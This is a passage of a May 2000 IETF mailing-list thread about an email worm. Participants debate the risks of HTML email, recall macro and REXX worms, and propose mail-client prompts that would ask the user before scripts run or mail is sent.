Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA06152
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 15:05:01 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id PAA16649
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 15:04:10 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 15:04:48 -0400
Message-ID: <00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Lillian,
Those newsletters that you have spoken of can quite easily be distributed
in text format with the standard html tags that are used in text based
messages already. Notice my sig has the standard mailto and http tags which
can be recognized by the e-mail browser ("Note this is a text message too"),
that directs the user to the necessary info if they are inclined without
ramming the website down their throat.
You are correct in stating that html e-mail does not necessarily and
ordinarily does not contain the actual graphical content, but it does "call"
the content in question the moment it is opened. This is transmitting an
entire webpage through e-mail because in fact a webpage is just the html
code which "calls" all the hrefs that exist elsewhere, whether on the local
host or not.
I certainly agree that html e-mail is also dangerous due to the ability to
link the content local to the e-mail readers host. It creates the ability
for the sender of an e-mail to gather information that may not be considered
sensitive or otherwise plainly undesirable. It also opens the ability to
introduce agents and other infectious material to a host that would
otherwise require a user's physical acceptance of such material.
The necessity to send e-mail in html is NOT. Regardless of whether a list
or commerce wishes to advertise through e-mail, there are already avenues
for distributing material to demographically selected individuals. Its
called the WWW and creating hypertext links in an e-mail to direct a user to
desired content is certainly MORE than enough, and also solves part of the
congestion problem, because the user must take the time to visit the site in
question as opposed the site making a visit to each and every recipient of
the message, whether they care about this week's issue of the newsletter or
not.
The issue here is not about whether it is technologically sound, but whether
we are able to market the masses with or without their expressed consent. If
a user wishes to visit a commerce's or industry's website they will
certainly follow the link provided in the e-mail. It is a different story to
simply place the web content directly in front of the user, and this begin
to cross the line of harassment and invasion. Its like the difference
between receiving an invitation to an open house, and finding out that the
open house is coming to YOUR house.
Technology doesn't have to contradictory...it is our (ietf) purpose to
ensure the internet is used efficiently and in the mass's best interests.
This doesn't mean regulation, but it does mean providing proper avenues to
get where ever a person wants to go. I will state again, that it isn't our
business to prevent access, but it is our business to make sure that people
can and do access in the appropriate manner in such a way as to ensure each
and every user is satisfied. I mean it would be really silly if you FINGERed
a site and got a webpage to display the information.
Analogously -html e-mail is a lot like the Microsoft windows is it good for
consumers or bad. HTML e-mail like Microsoft windows has made content
browsing easier and closer to ubiquitousness, but at the cost of user
education. If there is no reason for a user to learn how to use the web or
the rest of the net, then why should they???
-Scot Mc Pherson
-RF Engineer
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
-----Original Message-----
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 2:29 PM
To: 'Scot Mc Pherson'
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
Scot,
ITA we do not need the HTML email for our everyday use.
HTML based email is mainly used by the Email-Newsletter companies, (i.e.
Whitehat,
Exactis, etc...) especially for advertising purposes.
We can argue that we don't need it but in reality, these companies
live off the daily newsletters they send out. I believe all of these
newsletters
are being sent out to people who actually subscribed to receive them.
While the reason is mainly commercial it cannot be ignored. As far as the
bandwidth is concerned - most of those HTML emails don't actually email the
images
but rather display it via a link from their own server. (Which of course
does not help
bandwidth matters especially if first the run it through a logging agent).
I believe the problem starts when somebody writes an HTML email that can
retrieve,
write or execute anything on the receiving client's system.
I agree with you - it is contradictory. So is every new technology, even the
more
tangible ones. I'll bet once everybody agreed that there is no need for the
automobile, horses will do fine - but now we want to take our
tractor-trailer
to work, on an eco-car style gas-burn, and speed as fast as a Ferrari. Go
figure.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 1:59 PM
To: 'Lillian Komlossy'
Cc: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Lillian,
I am not so sure I totally agree. Why exactly do we need HTML based
e-mail...Is it really necessary? E-mail is a service for transmitting a
written message, and written messages certainly don't require background
graphics or a full blown graphically based webpage.
There are a few reasons why I believe this, one of the most
compelling IMHO
is that graphic content in e-mails increases the size of the e-mail
exponentially, thus greatly contributing to the packet congestion already
extremely evident on the Internet today. I realize that we are developing
new technologies all the time that increase bandwidth, but I think its
terribly inefficient, and dangerous.
There is no practical need for html e-mail. It like saying I want to
use a
tractor trailer to commute to work everyday, but it needs to consume only as
much gas as an eco car, and go as fast a Ferrari.
Scot
-----Original Message-----
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 11:13 AM
To: 'Scot Mc Pherson'
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
Scot,
While what you say is true - meaning an all-text restriction on your email
browser will prevent
"dangerous goods" to be downloaded - it also takes away functionality. We
have to find a way to
be able to use html based email but restrict it from - say running scripts,
executing anything,
writing cookies, issuing queries, etc... Until that happens, you're right -
html based email
is like a runaway train. We have to invent the "brakes" now.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
>>-----Original Message-----
>>From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
>>Sent: Thursday, May 11, 2000 10:07 AM
>>To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)'
>>Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED]
>>Subject: RE: VIRUS WARNING
>>
>>
>>I believe the one of the most important holes is html based mail, because
>>the e-mail is processed as a webpage which can be used to download
>>undesirable content. If you configure your e-mail browser to display all
>>messages as text you will close this hole...You will notice my e-mails are
>>nearly 100% text
>>
>>Scot
>From owner-ietf-outbound Thu May 11 15:40:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA06728
for [EMAIL PROTECTED]; Thu, 11 May 2000 15:40:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA06600
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 15:31:43 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4BJVgk21430;
Thu, 11 May 2000 15:31:43 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Scot Mc Pherson <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 11 May 2000 15:04:48 EDT."
<00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 15:31:39 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 11 May 2000 15:04:48 EDT, Scot Mc Pherson <[EMAIL PROTECTED]> said:
> The necessity to send e-mail in html is NOT. Regardless of whether a list
> or commerce wishes to advertise through e-mail, there are already avenues
> for distributing material to demographically selected individuals. Its
> called the WWW and creating hypertext links in an e-mail to direct a user to
> desired content is certainly MORE than enough, and also solves part of the
> congestion problem, because the user must take the time to visit the site in
> question as opposed the site making a visit to each and every recipient of
> the message, whether they care about this week's issue of the newsletter or
> not.
Strictly speaking, part 1: E-mail as a while is not a necessity. The US
Postal Service has a 200 year record of delivering large amounts of material
in a reasonably cost-effective manner.
Strictly speaking, part 2: A case could be made that there should *NOT* be
hypertext links in a text/plain segment of an E-mail. RFC2046, section 4.1.3
says pretty specifically:
4.1.3. Plain Subtype
The simplest and most important subtype of "text" is "plain". This
indicates plain text that does not contain any formatting commands or
directives. Plain text is intended to be displayed "as-is", that is,
OK? Got that? In other words, it's *PLAIN* text. You want hyperlinks,
use text/html or some other type that is defined to support them....
(Yes, I *know* people violate this all the time. Doesn't mean we should
encourage it *more* just because we don't like text/html....)
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 11 16:11:34 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA07196
for [EMAIL PROTECTED]; Thu, 11 May 2000 16:10:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA07171
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 16:09:29 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id PAA12637;
Thu, 11 May 2000 15:09:04 -0400
Date: Thu, 11 May 2000 15:09:04 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<v04210125b540adedd536@[130.237.150.138]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <v04210125b540adedd536@[130.237.150.138]>; from [EMAIL PROTECTED] on Thu,
May 11, 2000 at 08:36:52PM +0200
X-Loop: [EMAIL PROTECTED]
On Thu, May 11, 2000 at 08:36:52PM +0200, Jacob Palme wrote:
> At 10.11 -0600 0-05-11, Vernon Schryver wrote:
> > Once you restrict
> > HTML based email enough to be safe, why bother with anything more than
> > text and perhaps simple pictures?
> What is wrong with that. I use HTML-based e-mail mostly to
> inluce pictures in my messages.
Yup... It's real amusing to have your boss looking over your
shoulder just about the time a spammer hits your mailer with an html
message including <IMG SRC=....> tags embedding some of his porno
for you to sample (don't scoff, it has been occuring and has required some
people to do some fast talking). Another insiduous trick is to use the
refresh tag to bounce you over to his site where he may have other
pleasures for you like pop-up windows when you try to close the window.
This doesn't work as good since I don't think it's as well supported.
But it has been tried and does catch some chumps. Note that the refresh
tag is not active content and if you are reading E-Mail in a broswer,
it can be real effective and real embarassing. I don't know how
effective it is in mere html enabled readers like Outlook or Eudora.
As far as tracking down the perpetrators goes... How effective
have you been at tracking down the people responsible for spam?
> A very useful way of using HTML-based e-mail would also be
> to send out forms and fill them in via mail, but this does
> not work so well because some mailers does not handle such
> messages very good yet.
> --
> Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
> for more info see URL: http://www.dsv.su.se/jpalme/
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Thu May 11 16:21:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA07391
for [EMAIL PROTECTED]; Thu, 11 May 2000 16:20:02 -0400 (EDT)
Received: from localhost.localdomain ([216.52.68.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA07208
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 16:10:17 -0400 (EDT)
Received: from ecal.com (localhost [127.0.0.1])
by localhost.localdomain (8.9.3/8.9.3) with ESMTP id QAA32376
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 16:10:07 -0400
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 16:10:06 -0400
From: John Stracke <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-5.0 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
References: <[EMAIL PROTECTED]>
Content-Type: multipart/alternative;
boundary="------------95872F20B70C837D61220742"
X-Loop: [EMAIL PROTECTED]
--------------95872F20B70C837D61220742
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Vernon Schryver wrote:
> What good is HTML based email if it cannot run
> scripts or even contain links to other HTML content?
Well, there's basic formatting:
* Simple font variations (italics, bold, color, font) are an easy way to add
a bit of expressiveness to your text.
o Everybody says that the problem with email is that it's not expressive
enough.
o To compensate, we've got an elaborate set of conventions for imitating
what you can do in print and face-to-face (smileys, *asterisks* for
emphasis, etc.).
o But new users don't know these conventions.
o HTML offers the ability to do the same thing more comprehensibly.
Actual smiley faces, italics for emphasis (just like people are used
to seeing in print), headings.
* And, of course, lists and tables are amazingly useful.
And even simple links (never mind forms, applets, etc.) are great for, say,
workflow applications. When I worked for Netscape, HR made great use of HTML
mail in the internal network. When I wanted to take some vacation
time, I filled out a form on the HR site; they would send mail to my manager,
with one link to approve and one to deny. Much easier than paper-based systems,
or even non-email-based online systems (since the vacation request comes into
the inbox you already check, instead of making you go someplace else).
--
/===============================================================\
|John Stracke | http://www.ecal.com |My opinions are my own. |
|Chief Scientist |==============================================|
|eCal Corp. |Whose cruel idea was it for the word "lisp" to|
|[EMAIL PROTECTED]|have an "S" in it? |
\===============================================================/
--------------95872F20B70C837D61220742
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
Vernon Schryver wrote:
<blockquote TYPE=CITE>What good is HTML based email if it cannot run
<br>scripts or even contain links to other HTML content?</blockquote>
Well, there's basic formatting:
<ul>
<li>
Simple font variations (italics, bold, color, font) are an easy way to
add a bit of expressiveness to your text.</li>
<ul>
<li>
Everybody says that the problem with email is that it's not expressive
enough.</li>
<li>
To compensate, we've got an elaborate set of conventions for imitating
what you can do in print and face-to-face (smileys, *asterisks* for emphasis,
etc.).</li>
<li>
But new users don't know these conventions.</li>
<li>
HTML offers the ability to do the same thing more comprehensibly.
Actual smiley faces, italics for emphasis (just like people are used to
seeing in print), headings.</li>
</ul>
<li>
And, of course, lists and tables are<i> amazingly</i> useful.</li>
</ul>
And even simple links (never mind forms, applets, etc.) are great for,
say, workflow applications. When I worked for Netscape, HR made
great use of HTML mail in the internal network. When I wanted
to take some vacation time, I filled out a form on the HR site;
they would send mail to my manager, with one link to approve and one to
deny. <i>Much</i> easier than paper-based systems, or even non-email-based
online systems (since the vacation request comes into the inbox you already
check, instead of making you go someplace else).
<pre>--
/===============================================================\
|John Stracke | <A
|HREF="http://www.ecal.com">http://www.ecal.com</A> |My opinions are my own. |
|Chief Scientist |==============================================|
|eCal Corp. |Whose cruel idea was it for the word "lisp"
|to|
|[EMAIL PROTECTED]|have an "S" in
|it?
| |
\===============================================================/</pre>
</html>
--------------95872F20B70C837D61220742--
>From owner-ietf-outbound Thu May 11 16:31:34 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA07581
for [EMAIL PROTECTED]; Thu, 11 May 2000 16:30:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA07228
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 16:10:32 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id NAA07997;
Thu, 11 May 2000 13:10:15 -0700 (PDT)
Date: Thu, 11 May 2000 13:10:15 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: mail sandbox wall authority, inward and outbound
X-Loop: [EMAIL PROTECTED]
A MUA might ask the console operator for permission to proceed when:
1. A mail message wants to run a program. (e.g., ECMAscripts.)
2. An attachment is executable. (Nearly universal practice.)
3. A program wants to write to a file. (Usually not trapped more
than once per execution if at all.)
4. A program wants to read your address book. (Does any mail system
that offers this functionality limit it at all?)
5. A program wants to send mail. (e.g., having MAPI's Send notify
the user and queue the proposed message as a draft instead of sending.)
All of those precautions would help prevent the destruction and
spread of worms. (These mail things aren't "VIRUS"es, technically.)
If you had to pick one, #5, asking before sending mail and making
the user explicitly approve each message, might be the best choice,
because the resulting messages are easily reviewed and confirmed,
and the other actions might be more frequently legitimate.
These sorts of things are less common on the more heterogeneous
Unix world, but Unix mailers are just as culpable. If I wanted to
be consistent, I would demand that anything I run on Unix (without
a special permitted shell) which connects to port 25 should be
intercepted, wrapped with an "ok queued" SMTP response, and
forwarded to me instead. Would anyone argue that isn't reasonable?
Cheers,
James
P.S. this mail sent with /ucb/Mail by Bill Joy c. 1980
>From owner-ietf-outbound Thu May 11 16:41:29 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA07849
for [EMAIL PROTECTED]; Thu, 11 May 2000 16:40:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA07237
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 16:10:45 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id QAA17010
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 16:09:54 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 16:10:33 -0400
Message-ID: <00c101bfbb84$f730a220$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
strictly speaking the US postal service is not a form of electric or
electronic data communication
strictly speaking...my sig IS plain text...it is the browser that recognizes
that it could be used as a link
Strictly speaking
RFC2046, section 4.1.3
says pretty specifically:
4.1.3. Plain Subtype
The simplest and most important subtype of "text" is "plain". This
indicates plain text that does not contain any formatting commands or
directives. Plain text is intended to be displayed "as-is", that is,
but it says nothing of e-mail browsers recognizing a string of "plain-text"
as an address.
-Scot Mc Pherson
-RF Engineer
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 3:32 PM
To: Scot Mc Pherson
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
On Thu, 11 May 2000 15:04:48 EDT, Scot Mc Pherson
<[EMAIL PROTECTED]> said:
> The necessity to send e-mail in html is NOT. Regardless of whether a list
> or commerce wishes to advertise through e-mail, there are already avenues
> for distributing material to demographically selected individuals. Its
> called the WWW and creating hypertext links in an e-mail to direct a user
to
> desired content is certainly MORE than enough, and also solves part of the
> congestion problem, because the user must take the time to visit the site
in
> question as opposed the site making a visit to each and every recipient of
> the message, whether they care about this week's issue of the newsletter
or
> not.
Strictly speaking, part 1: E-mail as a while is not a necessity. The US
Postal Service has a 200 year record of delivering large amounts of material
in a reasonably cost-effective manner.
Strictly speaking, part 2: A case could be made that there should *NOT* be
hypertext links in a text/plain segment of an E-mail. RFC2046, section
4.1.3
says pretty specifically:
4.1.3. Plain Subtype
The simplest and most important subtype of "text" is "plain". This
indicates plain text that does not contain any formatting commands or
directives. Plain text is intended to be displayed "as-is", that is,
OK? Got that? In other words, it's *PLAIN* text. You want hyperlinks,
use text/html or some other type that is defined to support them....
(Yes, I *know* people violate this all the time. Doesn't mean we should
encourage it *more* just because we don't like text/html....)
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 11 17:20:33 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA08371
for [EMAIL PROTECTED]; Thu, 11 May 2000 17:20:02 -0400 (EDT)
Received: from bells.cs.ucl.ac.uk (bells.cs.ucl.ac.uk [128.16.5.31])
by ietf.org (8.9.1a/8.9.1a) with SMTP id RAA08346
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 17:17:44 -0400 (EDT)
Received: from sonic.cs.ucl.ac.uk by bells.cs.ucl.ac.uk with local SMTP
id <[EMAIL PROTECTED]>; Thu, 11 May 2000 22:17:41 +0100
to: [EMAIL PROTECTED]
Subject: Re: WORM WARNING
In-reply-to: Your message of "Thu, 11 May 2000 15:31:39 EDT."
<[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 22:17:39 +0100
Message-ID: <[EMAIL PROTECTED]>
From: Jon Crowcroft <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
if once it was a virus
which it wasnt
it surely is a worm now
of course,
microsoft have succeeded beyond david tenenhouses wildest dreams
in active network deployment
:-|
j.
>From owner-ietf-outbound Thu May 11 17:40:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA08628
for [EMAIL PROTECTED]; Thu, 11 May 2000 17:40:02 -0400 (EDT)
Received: from basecamp1.netquest.net (netquest.net [204.140.219.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA08551
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 17:31:41 -0400 (EDT)
Received: from nma.com (dsl0016.netquest.net [206.117.109.16]) by
basecamp1.netquest.net (8.9.1/8.8.6) with ESMTP id OAA25361 for <[EMAIL PROTECTED]>; Thu,
11 May 2000 14:32:32 -0700 (PDT)
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 11 May 2000 07:40:26 EDT."
<[EMAIL PROTECTED]>
Reply-to: [EMAIL PROTECTED]
From: Einar Stefferud <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 14:31:02 -0700
Message-ID: <[EMAIL PROTECTED]>
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
>From Steven M. Bellovin's message Thu, 11 May 2000 07:40:26 -0400:
}
}In message <[EMAIL PROTECTED]>, Einar Stefferud writes:
}
[snip]...
}
}>Seems to me that this beloved "feature" (giving root privs to random
}>EMail messages) should (by now) now be fully discredited, and should
}>be destined for extinction, if only the customers will accept its
}>disappearance in trade for an absence of a continuing flood of these
}>$6,000,000,000 economic loss episodes.
}
}See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how
}it worked -- but it didn't involve any analog to 'root' privileges.
}
I believe the distintion between USER Privs and ROOT Privs in Windows
is almost negligable, in that the typical user opening an attachment
in USER space allows major modifications of basic ROOT funtions and
data tables, hence in Windows (and probablby other PC environments
without multi-user system barriers) ther is very little TOOT
protection from USER run processes.
And, therein lays the "root" of the problem;-)...
This is of course aggravated by attachment of such PCs to the Internet
where all end users are responsible for protecting themselves, while
their software does not help them to protect themselves. It takes a
considerable wizard to do all the complex things that need to be done
to close the security holes.
But, whay large Fortune 2000 companies put up with all this is a great
mystery to me, and of course, intil they get the message here, they
will continue to fatten the MS purse while buying such trouble as
these problems will cause.
To repeat my mantra, it's the customer's fault, cause vendors insist
on selling what people will buy;-)...
How can any vendor do othersise?????? Cheers...\Stef
}
}When the recipient got a copy, there was an included (or attached; I
}don't quite remember) REXX file. (REXX was a scripting language for VM/
}CMS.) The message told you that it would display a Christmas card if
}you ran it; most users did just that, since the note appeared to come
}from someone they knew. And then the file replicated itself; you all
}know the rest.
}
}Note the two crucial points -- it ran with the user's permissions, and
}it was explicitly run by the user, rather than by any automatic
}mechanism.
}
} --Steve Bellovin
Cheers...\Stef
>From owner-ietf-outbound Thu May 11 17:50:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA08792
for [EMAIL PROTECTED]; Thu, 11 May 2000 17:50:03 -0400 (EDT)
Received: from broadsoft.com (broadsoft.com [161.58.239.68])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA08736
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 17:46:10 -0400 (EDT)
Received: from raymond ([216.181.56.35]) by broadsoft.com (8.8.8) id RAA54988; Thu, 11
May 2000 17:46:08 -0400 (EDT)
From: "Doug Sauder" <[EMAIL PROTECTED]>
To: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 17:54:41 -0400
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-reply-to: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id RAA08736
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
> -----Original Message-----
> From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]]
> That is exactly the same way that all Windows virus work. As a Windows
> user (as well as other OSes), I can say that people have to be
> responsible
> for their actions. Whenever you receive any Email attachment,
> the only way
> that attachment can produce any damage is if you run it.
>
> At least in my copy of MS Word anytime I open a word document and it
> contains
> any macros, Word readily ask me if I want to allow the macro to execute.
> Not only that, this version of Word (2000) is configured to only
> ask me when
> a signed (with a certificate of a trusted party) macro is included.
Suppose you made the mistake of opening a Word document with a VBA (Visual Basic for
Applications) script virus. (I did this once and I am sharing a real-life
experience.) The VBA script turns off the option that disables automatically running
scripts. I kid you not! Next time you open a Word document that contains a script,
you won't be asked whether you want to run it. If you go into the options settings
and set the option to disable running scripts, you have done nothing, because the
virus script runs when you close the document and turns the option back off again.
At least not allowing macros to disable the don't-run-macros option seems reasonable
to me, but it seemed to have escaped the engineers who created Microsoft Word.
Doug Sauder
Software Engineer
Broadsoft, Inc
>From owner-ietf-outbound Thu May 11 18:40:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA09580
for [EMAIL PROTECTED]; Thu, 11 May 2000 18:40:02 -0400 (EDT)
Received: from leonid.genesyslab.com (leonid.genesyslab.com [204.94.142.156])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA09546
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 18:38:03 -0400 (EDT)
Received: (from egoshin@localhost)
by leonid.genesyslab.com (8.9.3/8.9.3) id PAA00950;
Thu, 11 May 2000 15:38:34 -0700
Date: Thu, 11 May 2000 15:38:34 -0700
From: Leonid Yegoshin <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: mail sandbox wall authority, inward and outbound
X-Loop: [EMAIL PROTECTED]
>From: "James P. Salsman" <[EMAIL PROTECTED]>
>
>A MUA might ask the console operator for permission to proceed when:
>
>1. A mail message wants to run a program. (e.g., ECMAscripts.)
>
>2. An attachment is executable. (Nearly universal practice.)
>
>3. A program wants to write to a file. (Usually not trapped more
>than once per execution if at all.)
>
>4. A program wants to read your address book. (Does any mail system
>that offers this functionality limit it at all?)
>
>5. A program wants to send mail. (e.g., having MAPI's Send notify
>the user and queue the proposed message as a draft instead of sending.)
>
6. A program wants to send a file to somewhere. Or any permanently stored
information (like cookie but not limited).
- Leonid Yegoshin.
>From owner-ietf-outbound Thu May 11 19:10:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA10450
for [EMAIL PROTECTED]; Thu, 11 May 2000 19:10:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA09976
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 18:54:33 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id PAA22444;
Thu, 11 May 2000 15:54:10 -0700 (PDT)
Date: Thu, 11 May 2000 15:54:10 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: mail sandbox wall authority, inward and outbound
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Leonid,
Thanks for your addition:
